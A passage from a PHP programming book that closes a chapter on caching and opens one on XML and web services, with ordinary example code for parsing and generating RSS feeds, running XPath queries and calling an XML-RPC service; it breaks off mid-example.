Figure 11.1. SitePoint books at Amazon

Summary

Caching is an important and often overlooked aspect of web site development. Many factors that affect the performance of today’s web sites weren’t a problem for their predecessors, from complex, dynamic page generation to a reliance on third-party data over the network. In this chapter, we’ve examined HTML meta tags, HTTP headers, PHP output buffering and PEAR::Cache_Lite, and we’ve seen how you can use them to control the caching of your web site content and improve the site’s reliability and performance.
Implementing a caching system for your site might be simple, but ultimately, it depends on your requirements. If you have a busy and predominantly static web site (such as a blog) that’s managed through a content management system, it will likely require little alteration, yet may benefit from huge performance improvements resulting from a small investment of your time. Setting up caching for a more complex site that generates content on a per-user basis, such as a portal or shopping cart system, will prove a little more tricky and time consuming, but the benefits are still clear. Regardless, I hope the information in this chapter has given you a good grasp of the options available, and will help you determine which techniques are most suitable for your application.
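One concern raised earlier in this chapter was what happens when a visitor reads a cache file at the exact moment it is being rewritten. Cache_Lite handles this with its fileLocking option; for hand-rolled caches, a common alternative is to write to a temporary file and rename it into place. The following is only a minimal sketch of that idea: writeCacheAtomic is a hypothetical helper name, not part of the book's code archive or of Cache_Lite, and it assumes the cache directory already exists and sits on a local filesystem where rename replaces the target in a single step.

```php
<?php
// Hypothetical helper (an assumption for illustration, not the book's code):
// write the content to a temporary file in the cache directory, then rename
// it over the real cache file so readers never see a half-written file.
function writeCacheAtomic($content, $filename, $cacheDir = './cache/')
{
    // tempnam() creates a uniquely named empty file and returns its path
    $tmp = tempnam($cacheDir, 'tmp');
    if ($tmp === false) {
        return false;
    }

    // LOCK_EX takes an exclusive lock on the temporary file while writing
    if (file_put_contents($tmp, $content, LOCK_EX) === false) {
        unlink($tmp);
        return false;
    }

    // Swap the finished file into place; returns true on success
    return rename($tmp, $cacheDir . $filename);
}
```

A call such as writeCacheAtomic($header, 'header.cache') could stand in for the writeCache helper shown earlier. This sketch does not stop two requests from regenerating the same content at the same time; it only aims to keep readers from seeing a partial file.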
Chapter 12
XML and Web Services

After the changes to the object oriented programming model, probably the biggest additions to PHP 5 were the rewritten DOM XML extension, the new SimpleXML extension, and the new SOAP extension. PHP 5.1 introduced two new XML extensions, XMLReader and XMLWriter.

XML and web services are broad topics when viewed within the realm of PHP, due to the number of facilities that are available for producing and consuming XML. Entire books have been devoted to them. [1] In this chapter, we’ll explore useful solutions for handling some of the more common XML-related tasks, as well as for consuming and serving XML-based web services; the rest is up to you!

[1] Two good sources include Rob Richards’s Pro PHP XML and Web Services (Berkeley: Apress, 2006), and Thomas Myer’s No Nonsense XML Web Development With PHP (Melbourne: SitePoint, 2005).
[2] http://framework.zend.com/

Using the Zend Framework

A number of examples in this chapter utilize components from the Zend Framework. [2] Installation of the framework is simple: download the appropriate format
from http://framework.zend.com/download/, extract the archive, and update your include_path to point to the library directory of the installation.

Which XML technologies are available in PHP 5?

PHP 5 offers a number of new XML extensions. You can read about what’s new in the Zend Developer Network article, “XML in PHP 5: What’s New?” [3]

Solution

Table 12.1 summarizes the XML extensions available in PHP 5.

Why should I use PHP’s XML extensions instead of PHP string functions?

If XML is primarily a text format, why would we bother using the XML extensions? Why wouldn’t we simply concatenate strings to create documents, or use regular expressions to parse them?

Solution

The answer to this question is: for reasons of performance, compatibility, flexibility, and ease of use.

Certainly, XML documents can be parsed using a series of regular expressions. However, the PCRE engine is fairly heavyweight, and isn’t optimized for such tasks. Tools such as SimpleXML and XMLReader allow you to iterate through a document with ease, grabbing only the content you need without ever once writing a regular expression. Using SAX, you can trigger code to execute as particular elements are found in the document. XSL can be used to transform XML documents into other XML documents, XHTML, SQL, and more.

[3] http://devzone.zend.com/node/view/id/1713/
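To make the contrast with regular expressions a little more concrete, here is a minimal sketch that uses simplexml_load_string to pull element values out of a small document. The XML content and the $source and $titles variable names are invented purely for illustration; the point is only that no pattern matching is needed and that entities such as &amp; are decoded by the parser.

```php
<?php
// The XML below is made up for illustration only.
$source = <<<XML
<books>
  <book id="1"><title>PHP &amp; XML</title></book>
  <book id="2"><title>Caching Basics</title></book>
</books>
XML;

$xml = simplexml_load_string($source);

$titles = array();
foreach ($xml->book as $book) {
    // Casting to string yields the element's text, with &amp; decoded to &
    $titles[] = (string) $book->title;
}

echo implode("\n", $titles), "\n";
```

A regular expression would have to cope with attributes, whitespace, and entity decoding by hand, whereas here the parser takes care of those details.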
Table 12.1. XML Extensions in PHP

Extension: SAX
Purpose: This set of PHP functions was designed for creating XML parsers and XML event handlers. It has been available since PHP 4 and is enabled by default.
More Information: http://www.php.net/xml/

Extension: DOM
Purpose: This OOP extension allows you to operate on or create an XML document using the Document Object Model, or DOM. It has been available since PHP 5.0.0 and is enabled by default.
More Information: http://www.php.net/dom/

Extension: XPath
Purpose: Built into the DOM extension, XPath allows you to perform queries on your XML documents. It’s been available as part of the DOM extension since PHP 5.0.0.
More Information: (none listed)

Extension: XSL
Purpose: An OOP extension for performing Extensible Stylesheet Language Transformations (XSLT) on DOM documents, XSL has been available since PHP 5.0.0. It can be enabled by sending the --with-xsl argument to the compiler.
More Information: http://www.php.net/xsl/

Extension: SimpleXML
Purpose: An OOP tool set used to convert XML to iterable objects, and thus allow the processing of XML using normal property selectors and array access. Available since PHP 5.0.0, SimpleXML is enabled by default; some features vary between PHP versions.
More Information: http://www.php.net/simplexml/

Extension: XMLReader
Purpose: An OOP extension for iterating through an XML stream a node at a time, XMLReader has been available in PECL since PHP 5.0.0, and enabled by default since PHP 5.1.0.
More Information: http://www.php.net/xmlreader/

Extension: XMLWriter
Purpose: This hybrid extension uses either function or OOP access to create XML documents. Available in PECL since PHP 5.1.0, it has been enabled by default since PHP 5.1.4. Enable it by sending the --with-xmlwriter argument to the compiler in previous versions.
More Information: http://www.php.net/xmlwriter/
  • 422. Table 12.1. XML Extensions in PHP (continued)

Extension | Purpose | More Information
XML-RPC | A set of functions that allow developers to encode and decode XML-RPC values and create XML-RPC servers that use PHP functions and callbacks to handle requests. XML-RPC has been available since PHP 4.1.0. Enable it by passing the --with-xmlrpc option to the configure script. | http://www.php.net/xmlrpc/
SOAP | The SOAP extension allows developers to create SOAP clients or servers easily, and to bind objects or functions to the client or server. Available since PHP 5.0.0, it can be enabled by passing the --enable-soap option to the configure script. | http://www.php.net/soap/

Discussion

XML documents may easily be written as the standard output of an application, or by concatenating strings. However, you then need to worry about character encoding issues, typos that may affect document validity, and more. You can avoid these issues using tools such as the DOM or XMLWriter extensions.

How do I parse an RSS feed?

RSS is becoming a ubiquitous Web technology: most sites offer RSS feeds of their updated content, and many use this as a means to communicate with users. How can you incorporate RSS feeds from other sites on your own?

Solutions

SimpleXML makes parsing XML as easy as traversing an object: instead of needing to check for the element’s position, name, and type, we simply access the element. To do so, though, we need to know something about the structure of the XML we’re parsing; RSS, since it’s a published standard, is easy to parse using SimpleXML.

One thing to remember with SimpleXML is that if you want the actual value of a property you’re accessing, you must cast it to the appropriate type first; otherwise, you’ll receive the SimpleXMLElement representing the value. In the following example, we use the simplexml_load_file function to load the RSS from the sitepoint.com blogs feed and output the content of some of the elements:
  • 423. simplexml.php (excerpt)

    $url = 'http://rss.sitepoint.com/f/sitepoint_blogs_feed';
    $xml = simplexml_load_file($url);
    $channel = $xml->channel;
    echo "Title: ", (string) $channel->title, "\n",
         "Description: ", (string) $channel->description, "\n",
         "Link: ", (string) $channel->link, "\n";
    foreach ($channel->item as $item)
    {
      echo "Item: ", (string) $item->title, "\n",
           "Link: ", (string) $item->link, "\n",
           "Description:\n", (string) $item->description, "\n";
    }

The SimpleXML solution provided above is just one of several approaches you may use with PHP 5. Let’s take a quick look at some other possibilities which, by contrast, show off the elegance of SimpleXML.

Parsing XML with XMLReader

XMLReader is a newcomer on the PHP scene, having been enabled by default only since PHP 5.1.0. It allows iterative access to XML documents using object oriented notation. However, it is more in the class of SAX than DOM or SimpleXML, as it provides a more programmatic way to process the document.

In this example, we’ll build a class, Rss_XmlReader, to encapsulate the functions we need to parse an RSS feed using XMLReader. First, we define some class properties and the constructor method:

Rss_XmlReader.class.php (excerpt)

    class Rss_XmlReader
    {
      public $channelTitle = '';
      public $channelDesc = '';
      public $channelLink = '';
      public $items = array();
      public $xml;
      public function __construct($url = null)
      {
        if (null !== $url)
  • 424.
        {
          $this->load($url);
        }
      }

The first three of these properties hold the RSS channel information, the $items array will hold all the RSS items from the specified feed, and $xml will hold the feed’s raw XML source. The constructor takes one argument: the URL of the RSS feed. If a URL is provided to the constructor, we’ll load and parse it immediately.

Here’s what the load method looks like:

Rss_XmlReader.class.php (excerpt)

      public function load($url)
      {
        $this->xml = file_get_contents($url);
        $xr = new XMLReader();
        $xr->XML($this->xml);
        $this->channelTitle = '';
        $this->channelDesc = '';
        $this->channelLink = '';
        $this->items = array();
        while ($xr->read())
        {
          if (XMLReader::ELEMENT == $xr->nodeType)
          {
            switch ($xr->localName)
            {
              case 'channel':
                $this->_getChannelInfo($xr);
                break;
              case 'item':
                $this->_getItem($xr);
                break;
            }
          }
        }
      }
  • 425. Using file_get_contents, we retrieve the raw XML source, instantiate a new XMLReader, and begin to read the RSS feed. As I mentioned previously, XMLReader requires us to iterate through every node of the document, including the text nodes inside each element. During the load routine, we go through the top-level element nodes of the document, and, if the current node is a channel, we read the channel information. If it’s an item element, we read the details of the item.

The _getChannelInfo method reads the channel information from the channel element:

Rss_XmlReader.class.php (excerpt)

      protected function _getChannelInfo($xr)
      {
        while ($xr->read() && ($xr->depth == 2))
        {
          if (XMLReader::ELEMENT == $xr->nodeType)
          {
            switch ($xr->localName)
            {
              case 'title':
                $xr->read();
                $this->channelTitle = $xr->value;
                break;
              case 'description':
                $xr->read();
                $this->channelDesc = $xr->value;
                break;
              case 'link':
                $xr->read();
                $this->channelLink = $xr->value;
                break;
              case 'item':
                // The reader only moves forward: an item met here must be
                // parsed now, or load() would never see its opening tag.
                $this->_getItem($xr);
                break;
            }
          }
        }
      }

Parsing the channel information requires that we pluck the appropriate nodes out of the channel element, including the channel title, description, and link, and store them in the appropriate object properties. Because item elements are also children of channel, and XMLReader cannot step backwards, any item this loop meets is handed to _getItem straight away; otherwise the first item of the feed would be consumed here and lost.
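The depth comparisons in these methods rely on how XMLReader numbers nesting levels: the root element is at depth 0, its children at depth 1, and so on. As a small illustration, assuming a made-up two-level feed held in a string, the following sketch records the depth of every element the reader visits.

```php
<?php
// A tiny, made-up RSS document (no whitespace, to keep the node list short).
$xml = '<rss version="2.0"><channel><title>Demo</title>'
     . '<item><title>First</title></item></channel></rss>';

$xr = new XMLReader();
$xr->XML($xml);

// Record "name:depth" for every element start tag the reader visits.
$depths = array();
while ($xr->read()) {
    if (XMLReader::ELEMENT == $xr->nodeType) {
        $depths[] = $xr->localName . ':' . $xr->depth;
    }
}
$xr->close();

echo implode(', ', $depths), "\n";
// prints: rss:0, channel:1, title:2, item:2, title:3
```

The channel’s own title and the item element both sit at depth 2, while an item’s title sits at depth 3, which is why the channel loop tests for depth 2 and the item loop for anything deeper.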
  • 426. Parsing an item is really no different from parsing the channel information: we grab one item element at a time. The only difference is that the information is stored in the $items array for later iteration:

Rss_XmlReader.class.php (excerpt)

      protected function _getItem($xr)
      {
        $title = '';
        $link = '';
        $desc = '';
        $date = '';
        while ($xr->read() && ($xr->depth > 2))
        {
          if (XMLReader::ELEMENT == $xr->nodeType)
          {
            switch ($xr->localName)
            {
              case 'title':
                $xr->read();
                $title = $xr->value;
                break;
              case 'description':
                $xr->read();
                $desc = $xr->value;
                break;
              case 'link':
                $xr->read();
                $link = $xr->value;
                break;
              case 'pubDate': // the RSS 2.0 date element
              case 'date':    // for example, dc:date
                $xr->read();
                $date = $xr->value;
                break;
            }
          }
        }
        $this->items[] = array(
          'title' => $title,
          'link' => $link,
          'desc' => $desc,
          'date' => $date
        );
      }
    }
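The load method shown earlier fetches the whole feed with file_get_contents before parsing it. Where memory matters more than keeping the raw source, one variation is to hand the location to XMLReader’s open method and let it read incrementally. The sketch below is an assumption-laden illustration rather than part of the class: it writes a made-up feed to a temporary file so that it runs without network access, and collects only the item titles.

```php
<?php
// Write a small, made-up feed to a temporary file so the sketch is
// runnable offline; in practice the argument to open() could be a URL.
$path = tempnam(sys_get_temp_dir(), 'rss');
file_put_contents(
    $path,
    '<rss version="2.0"><channel><title>Demo</title>'
    . '<item><title>First</title></item>'
    . '<item><title>Second</title></item>'
    . '</channel></rss>'
);

$xr = new XMLReader();
$xr->open($path); // read from the URI rather than from a string

$titles = array();
while ($xr->read()) {
    // Item titles sit at depth 3; the channel title is at depth 2.
    if (XMLReader::ELEMENT == $xr->nodeType
        && 'title' == $xr->localName
        && 3 == $xr->depth) {
        $xr->read();            // advance to the text node
        $titles[] = $xr->value;
    }
}
$xr->close();
unlink($path);

echo implode(', ', $titles), "\n";
// prints: First, Second
```

The trade-off is that the raw XML is no longer available in a property afterwards, so this only suits code that doesn’t need the $xml source.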
  • 427. Here is an example of our class in use:

xmlreader.php (excerpt)

    <?php
    require_once 'Rss_XmlReader.class.php';
    $rss = new Rss_XmlReader(
        'http://rss.sitepoint.com/f/sitepoint_blogs_feed');
    echo "Title: ", $rss->channelTitle, "\n",
         "Description: ", $rss->channelDesc, "\n",
         "Link: ", $rss->channelLink, "\n";
    foreach ($rss->items as $item)
    {
      echo "Item: {$item['title']}\nLink: " .
           "{$item['link']}\nDescription:\n{$item['desc']}\n";
    }
    ?>

Now that all this work is done, we finally have the equivalent of the simple solution we presented earlier with SimpleXML. Unfortunately, we’ve also done a lot more work.

SimpleXML with Zend_Feed

RSS feeds are not the only feeds available, and you might want to access multiple feed types in a similar fashion. Zend_Feed, a component of the Zend Framework, offers a unified interface to both RSS and Atom feeds.4 It’s basically a class that uses SimpleXML, but simplifies the process of retrieving the values by eliminating the need to cast them to the appropriate type.

4 For Zend_Feed documentation, see http://framework.zend.com/manual/en/zend.feed.html.

Here’s an example:

zendfeed.php (excerpt)

    require_once 'Zend/Feed/Rss.php';
    $url = 'http://rss.sitepoint.com/f/sitepoint_blogs_feed';
    $channel = new Zend_Feed_Rss($url);
    // Use function syntax to grab properties as values
    echo "Title: ", $channel->title(), "\n",
         "Description: ", $channel->description(), "\n",
         "Link: ", $channel->link(), "\n";
  • 428.
    foreach ($channel as $item)
    {
      echo "Item: ", $item->title(), "\n",
           "Link: ", $item->link(), "\n",
           "Description:\n", $item->description(), "\n";
    }

Discussion

As you can see, using SimpleXML or Zend_Feed is much simpler than creating your own parser, as we did when we used XMLReader. The approach that uses Zend_Feed doesn’t differ much from that which used SimpleXML; it simply eliminates the need to perform type casting. So, why would we bother with XMLReader?

In the days of PHP 4, the parsing of XML in formats such as RSS feeds was almost always done in SAX, if it wasn’t done using simple regular expressions. The DOM XML extension was a latecomer on the PHP 4 scene and wasn’t included in the core distribution, and thus did not gain much popularity amongst PHP 4 users. In addition, most PHP 4 books demonstrated XML parsing using SAX, which led many developers to use SAX whenever XML parsing was required.

Things have changed, however, and we now have a plethora of options for parsing XML in PHP 5. SAX is still a good option if you’re parsing large documents, as it parses element by element, allowing PHP to keep a low memory footprint. However, since it does parse element by element, and requires the developer to define callbacks practically at a per-element level, it’s rather unintuitive to use, and developers tend to end up mired in the details of keeping track of element names and references. If you thought the XMLReader example above was difficult to follow, a SAX example would have had you completely lost.

XMLReader combines the low memory footprint of SAX with some of the simplicity of SimpleXML. Like SAX, XMLReader parses the document incrementally as it reads it. Unlike SAX, which pushes events to handlers that you register, XMLReader is a pull parser: your code asks for the next node when it’s ready for it. You don’t have to specify handlers for elements, and it’s relatively simple to parse through a document in a single loop.
The main benefit of using XMLReader is performance; since XMLReader operates on a stream instead of pulling the entire
  • 429. XML document into memory, it can achieve a lot of processing with a small memory footprint.

DOM functions can also be used to navigate XML.5 This option has one feature that makes it an excellent choice for many: XPath integration. XPath allows you to search for nodes within the document by path, an excellent technique for those times when you want to pull data selectively from an XML document. However, looping over elements with the DOM functions is more laborious than it is with SimpleXML; they’re simply overkill for a situation as simple as parsing an RSS feed. Use DOM when you need to do more complex tasks, such as modifying XML documents in place.

For most tasks, the best answer to the question of how to parse XML is to use SimpleXML, or a library wrapping it, such as Zend_Feed. The simplicity of treating an XML document like a native PHP object cannot be overstated. In addition, because it builds on the DOM extension, it has built-in XPath support, and at any point you can convert a SimpleXMLElement to a DOMElement using the dom_import_simplexml function.6

5 http://www.php.net/dom/
6 http://www.php.net/dom_import_simplexml/

How do I generate an RSS feed?

While it’s great to know how to parse RSS feeds, at some point, you’ll undoubtedly want to generate your own. What XML technologies can you use with PHP 5 to generate an RSS feed?

Solutions

All these solutions use the following data definition with which to generate the RSS feed (you can find the complete file in the code archive):

rsssource.php.inc (excerpt)

    $baseUrl = 'http://example.com/extensions/xml/';
    $extensions = array(
      1 => array(
        'title' => 'SAX',
        'description' => 'ext/xml provides a SAX XML parser generator',
        'link' => $baseUrl . 'sax'
  • 430.
      ),
      2 => array(
        'title' => 'DOM',
        'description' => 'The DOM extension provides an implementation of DOM, the Document Object Model',
        'link' => $baseUrl . 'dom'
      ),
      3 => array(
        'title' => 'XPath',
        'description' => 'XPath is used to query XML documents for elements',
        'link' => $baseUrl . 'xpath'
      )
      ⋮ more array items follow…
    );

Because of its ability to map object properties to XML elements, SimpleXML makes it very easy to generate XML documents quickly:

rss_simplexml.php (excerpt)

    require 'rsssource.php.inc';
    $rss = new SimpleXMLElement(
        '<?xml version="1.0" encoding="UTF-8" ?>' .
        '<rss version="2.0"></rss>');
    $rss->addChild('channel');
    $rss->channel->addChild('title', 'PHP XML Extensions');
    $rss->channel->addChild('description',
        'Information and examples for using the PHP XML extensions');
    $rss->channel->addChild('link',
        'http://example.com/extensions/xml/');
    foreach ($extensions as $extension)
    {
      $item = $rss->channel->addChild('item');
      $item->addChild('title', $extension['title']);
      $item->addChild('description', $extension['description']);
      $item->addChild('link', $extension['link']);
    }
    echo $rss->asXML();

We previously used SimpleXML to parse XML; in PHP 5.1.3 and versions above, it can also be used to generate XML (instead of simply modifying existing XML). It
  • 431. doesn’t offer the full set of tools that the DOM makes available, but you can always convert your SimpleXMLElement to a DOMElement using dom_import_simplexml.

As with the task of parsing XML, there’s more than one way to generate XML; other options include DOM and XMLWriter.

Generating XML Using the DOM

DOM, the Document Object Model, allows you to traverse XML in a tree-like structure, looking down the tree at child nodes, up the tree at parent nodes, and horizontally at sibling nodes. Since it supports the entire breadth of XML, the DOM is an excellent all-around choice for generating XML structures:

rss_dom.php (excerpt)

    require 'rsssource.php.inc';
    $document = new DOMDocument('1.0', 'UTF-8');
    $rss = $document->createElement('rss');
    $rss->setAttribute('version', '2.0');
    $channel = $document->createElement('channel');
    $title = $document->createElement('title', 'PHP XML Extensions');
    $description = $document->createElement('description',
        'Information and examples for using the PHP XML extensions');
    $link = $document->createElement('link',
        'http://example.com/extensions/xml/');
    $channel->appendChild($title);
    $channel->appendChild($description);
    $channel->appendChild($link);
    foreach ($extensions as $extension)
    {
      $item = $document->createElement('item');
      $title = $document->createElement('title', $extension['title']);
      $description = $document->createElement('description',
          $extension['description']);
      $link = $document->createElement('link', $extension['link']);
      $item->appendChild($title);
      $item->appendChild($description);
      $item->appendChild($link);
      $channel->appendChild($item);
    }
    $rss->appendChild($channel);
    $document->appendChild($rss);
    echo $document->saveXML();
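One caveat is worth checking against the PHP manual before feeding arbitrary data into the listing above: the manual notes that the value passed as the second argument to createElement is not fully escaped, and that an ampersand must be escaped by hand. A way around this, sketched below with a made-up title, is to create the element empty and append a text node, which is escaped when the document is serialized.

```php
<?php
// Hypothetical value containing an ampersand and angle brackets.
$rawTitle = 'Q&A: <b> tags & entities';

$document = new DOMDocument('1.0', 'UTF-8');
$document->formatOutput = true; // indent the output for readability

$item  = $document->createElement('item');
$title = $document->createElement('title'); // created empty

// The text node holds the raw value; escaping happens on output.
$title->appendChild($document->createTextNode($rawTitle));
$item->appendChild($title);
$document->appendChild($item);

$xml = $document->saveXML();
echo $xml;

// Parsing the output again should give back the original value.
$check = simplexml_load_string($xml);
echo (string) $check->title, "\n";
```

The extra appendChild call costs one line per element, but it means the data never has to be pre-escaped by the calling code.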
  • 432. Generating XML Using XMLWriter

XMLWriter is a cousin to XMLReader. It allows you to iteratively write XML documents, element by element, and to write either in-memory or directly to a URI.7 The XMLWriter interface can be accessed using either OOP or procedural function calls:

rss_xmlwriter.php (excerpt)

    require 'rsssource.php.inc';
    $xw = new XMLWriter();
    $xw->openMemory(); // use openUri() to output directly to a file
    $xw->startDocument('1.0', 'UTF-8');
    $xw->startElement('rss');
    $xw->writeAttribute('version', '2.0');
    $xw->startElement('channel');
    $xw->writeElement('title', 'PHP XML Extensions');
    $xw->writeElement('description',
        'Information and examples for using the PHP XML extensions');
    $xw->writeElement('link', 'http://example.com/extensions/xml/');
    foreach ($extensions as $extension)
    {
      $xw->startElement('item');
      $xw->writeElement('title', $extension['title']);
      $xw->writeElement('description', $extension['description']);
      $xw->writeElement('link', $extension['link']);
      $xw->endElement(); // item
    }
    $xw->endElement(); // channel
    $xw->endElement(); // rss
    $xml = $xw->outputMemory(true);
    echo $xml;

7 For an in-depth explanation of XMLWriter, check out php|architect’s May 2006 issue, which has an article entitled "XMLWriter," by Rob Richards, author of the extension.

Discussion

While probably the easiest solutions for generating XML are simply to concatenate strings or to use a templating system, both have a significant drawback: they make it very easy to mix character encodings accidentally or to introduce extraneous tags or reserved XML entities, and thus end up with invalid XML. The better solution
  • 433. is to use one of the DOM, SimpleXML, or XMLWriter extensions, which take care of those problems automatically.

XMLWriter is a relatively new extension that can be very useful if you’re generating XML content sequentially. It’s a great choice if you have a fairly flat tree structure, as this approach is almost as easy as concatenating strings or using a template system, yet it protects you against encoding issues and improperly formed XML. XMLWriter is also a great choice if you’re creating large documents, as it has the ability to write documents directly to disk instead of keeping them in memory. This approach helps prevent the kinds of memory issues found in the more heavyweight extensions, such as DOM and SimpleXML, that operate entirely in memory. On the downside, you have to close your own elements and keep track of where you are in the tree in order to use this functionality. Your best bet is to use code indentation and comments to keep track of where you are in the tree.

DOM allows you to build your documents from the inside out, and vice versa. However, you’ll quickly become bogged down trying to remember which node you’re in and whether or not it has children or a parent, because you need to operate on individual DOMElements. There’s no easy way to view the overall tree structure from your code. As a result, it’s probably best to use the DOM when you need to modify existing XML.

As we’ve seen in these examples, SimpleXML allows you to build XML documents as well as read them. Its object mapping of XML makes it very easy to create visual trees in your code, and its ties to the DOM mean that once you’ve created the structure, you can easily manipulate the document using DOM to set the encoding and namespaces as necessary. The combination of SimpleXML and DOM should become the Swiss Army Knife of your XML toolbox in PHP 5.

How do I search for a node or content in XML?
Often, you only need a few pieces of information from a particular XML document. Should you parse the entire document to find those elements? What if, for example, all you need is a set of siblings that share a given element name?
  • 434. Solution

The solution is easy: use XPath. XPath, the XML Path Language, allows you to search the logical structure of a document using a URL-like path notation. It was originally developed to aid in XSL transformations, but has many other uses. The DOM extension has built-in support for XPath; so does SimpleXML. Here’s an example that uses the DOM extension:

xpath_dom.php (excerpt)

    $doc = new DOMDocument;
    $doc->preserveWhiteSpace = false;
    $doc->load('http://rss.sitepoint.com/f/sitepoint_blogs_feed');
    $xpath = new DOMXPath($doc);
    $titles = $xpath->query('//item/title');
    foreach ($titles as $title)
    {
      echo $title->nodeValue, "\n";
    }

This example loads the SitePoint blog feed and uses the XPath query //item/title to select the title elements from all the item elements.

Here’s a similar solution using SimpleXML:

xpath_simplexml.php (excerpt)

    $doc = new SimpleXMLElement(
        'http://rss.sitepoint.com/f/sitepoint_blogs_feed',
        null,
        true // tell SimpleXML that we're supplying a URL
    );
    // search for titles with an item parent
    foreach ($doc->xpath('//item/title') as $title)
    {
      echo $title, "\n";
    }
  • 435. Discussion

XPath could easily be the subject of an entire chapter, or even a book. The following discussion serves only as the briefest of introductions; for full documentation on the subject, check out the XPath specification at the W3C.8 9

XPath operates under a number of rules, the most basic of which is that the forward slash, /, is used as a path separator between different levels in the XML tree hierarchy. In the examples above, we were looking only for title nodes that were children of item elements: item/title. In order to tell XPath to match that pattern at any depth of the document, rather than spelling out the whole path from the root node, we prefix the path with double slashes, //. The same data could have been queried using a full path to the elements, /rss/channel/item/title.

The most basic rules for using XPath are:

■ A forward slash, /, is a path separator.
■ An absolute path from the root starts with a single forward slash, /.
■ A relative path from a given location can start with anything else.
■ A path matching elements at any depth of the document starts with two forward slashes, //.
■ A double period, .., indicates the parent of a node.
■ A single period, ., indicates the current node.

XPath also allows you to match against element attributes, specific items within a set of results, and even element values:

■ Match values using [NODE=""], where NODE is a node name or indicator (such as . or ..).
■ Match attributes using @ATTR, either as part of the path expression, or as a modifier to the node (for example item/@type, item[@type], item[@type='']).
■ Match a specific element by position using brackets (for example, //item/title[2]); note that indices start at 1, and that the position is counted among the siblings under each parent, so //item/title[2] matches the second title inside an item. To pick the second node from the whole result set, wrap the path in parentheses: (//item/title)[2].

8 http://www.w3.org/TR/xpath/
9 Sun also has an excellent XPath tutorial available at http://java.sun.com/j2ee/1.4/docs/tutorial/doc/JAXPXSLT3.html.
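The rules above can be tried out against a small document. The sketch below is illustrative only: the feed is made up, the type attribute is hypothetical (it is not part of RSS), and queryStrings is a helper invented for this example that returns each match as a plain string.

```php
<?php
// A small, made-up feed; the type attribute exists only to demonstrate
// attribute matching.
$xml = <<<XML
<rss version="2.0">
  <channel>
    <title>Demo Feed</title>
    <item type="news"><title>First post</title></item>
    <item type="tip"><title>Second post</title></item>
    <item type="news"><title>Third post</title></item>
  </channel>
</rss>
XML;

$doc = new SimpleXMLElement($xml);

// Hypothetical helper: run a query and return the matches as strings.
function queryStrings($doc, $path)
{
    $out = array();
    foreach ($doc->xpath($path) as $node) {
        $out[] = (string) $node;
    }
    return $out;
}

// Absolute path from the root: the three item titles.
$absolute = queryStrings($doc, '/rss/channel/item/title');
// Any depth: the channel title plus the three item titles.
$anyDepth = queryStrings($doc, '//title');
// Attribute predicate: titles of items whose type is "news".
$byAttr = queryStrings($doc, '//item[@type="news"]/title');
// Value predicate, then up to the parent item and across to its attribute.
$byValue = queryStrings($doc, '//item/title[.="Second post"]/../@type');
// Position counted per parent: no item has a second title, so no matches.
$perParent = queryStrings($doc, '//item/title[2]');
// Position counted over the whole result set: the second title overall.
$second = queryStrings($doc, '(//item/title)[2]');

echo implode(' | ', $byAttr), "\n";  // prints: First post | Third post
echo implode(' | ', $byValue), "\n"; // prints: tip
echo count($perParent), "\n";        // prints: 0
echo implode(' | ', $second), "\n";  // prints: Second post
```

The last two queries show why the parentheses matter when you want the nth node of a result set rather than the nth child of each parent.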
  • 436. As an example, on the day I write this, the SitePoint Blogs RSS feed presents an item with the title, “News Wire: Liquid vs. Fixed.” To grab this item element, I can use the following code:

    // assuming $doc is a SimpleXMLElement
    $item = $doc->xpath(
        '//item/title[.="News Wire: Liquid vs. Fixed"]/..');

Those lines return an array containing the item node (with its children) by matching:

■ all item elements (//item)
■ that have a title element (/title)
■ with a value of “News Wire: Liquid vs. Fixed” ([.="News Wire: Liquid vs. Fixed"])
■ and return the parent item element (/..)

Several wildcards are also allowed:

■ * matches any element node (not a text or attribute node).
■ node() matches any type of node.
■ @* matches any attribute.

XPath has much more to offer, including operators and a set of functions for matching and manipulating strings in the path. If you find yourself needing to search your XML documents, XPath is a good skillset to have at your disposal.

How can I consume XML-RPC web services?

XML-RPC is an XML-based protocol for performing remote procedure calls: basically, the process of calling functions and methods on a remote machine. The XML-RPC specification defines a simple structure for calling a method on a server with one or more parameters of given types; a single value is returned, just like a PHP function.10 For more information on XML-RPC, visit the official XML-RPC web site.11

10 http://www.xmlrpc.com/spec/
11 http://www.xmlrpc.com/
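To make that “simple structure” concrete, here is a sketch that builds the request body for the specification’s own sample call, examples.getStateName with the integer 41. It uses XMLWriter purely for illustration; real clients, such as those discussed in this section, generate this document for you.

```php
<?php
// Build the XML-RPC request for the specification's sample call,
// examples.getStateName(41). Nothing is sent over the network here.
$xw = new XMLWriter();
$xw->openMemory();
$xw->setIndent(true); // one element per line, for readability
$xw->startDocument('1.0', 'UTF-8');
$xw->startElement('methodCall');
$xw->writeElement('methodName', 'examples.getStateName');
$xw->startElement('params');
$xw->startElement('param');
$xw->startElement('value');
$xw->writeElement('i4', '41'); // i4: a four-byte signed integer
$xw->endElement(); // value
$xw->endElement(); // param
$xw->endElement(); // params
$xw->endElement(); // methodCall
$xw->endDocument();
$request = $xw->outputMemory();

echo $request;

// Read the request back to confirm its structure.
$check = simplexml_load_string($request);
echo (string) $check->methodName, "\n"; // prints: examples.getStateName
```

A request like this is sent as the body of an HTTP POST, and the server answers with a methodResponse document wrapping a single value.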
  • 437. XML-RPC also uses the concept of namespaces. Namespaces allow a single server to serve several groups of related methods in a way that ensures that method name collisions do not occur. A prototype XML-RPC method call might look like this:

    struct lookup.state(string)

This call indicates that the state method of the lookup namespace expects a string as an argument, and returns a struct (associative array) as a response. An actual call, using Zend Framework’s Zend_XmlRpc_Client, might look like this:

    $info = $client->lookup->state('Vermont');

XML-RPC is the grand-daddy of web services, and its simplicity is appealing to many developers; with the clients available in most languages, we simply pass in native values, and receive a native value as a response. So, now you know about XML-RPC; how can you consume an XML-RPC service?

Solution

The Zend Framework offers an XML-RPC implementation that includes both a client and server. Its interface is entirely object oriented, making it a good choice for OOP enthusiasts; in particular, the ability to chain namespaces leading to a method makes it incredibly intuitive to use.

As an example, here’s a simple XML-RPC client script that uses the XML-RPC server in “How do I serve my own XML-RPC web services?”. The server exposes a math namespace with two methods, add and multiply:

zend_xmlrpc_client.php (excerpt)

    require_once 'Zend/XmlRpc/Client.php';
    try
    {
      $client = new Zend_XmlRpc_Client(
          'http://localhost/phpant2/chapter_12/examples/' .
          'zend_xmlrpc_serv.php');
      $proxy = $client->getProxy();
      $add = $proxy->math->add(array(1,2));
      $mult = $proxy->math->multiply(array(21343243346,989554365486));
      echo '1 + 2 = ' . $add . "<br />";
      echo '21343243346 * 989554365486 = ' . $mult;
    }
  • 438.
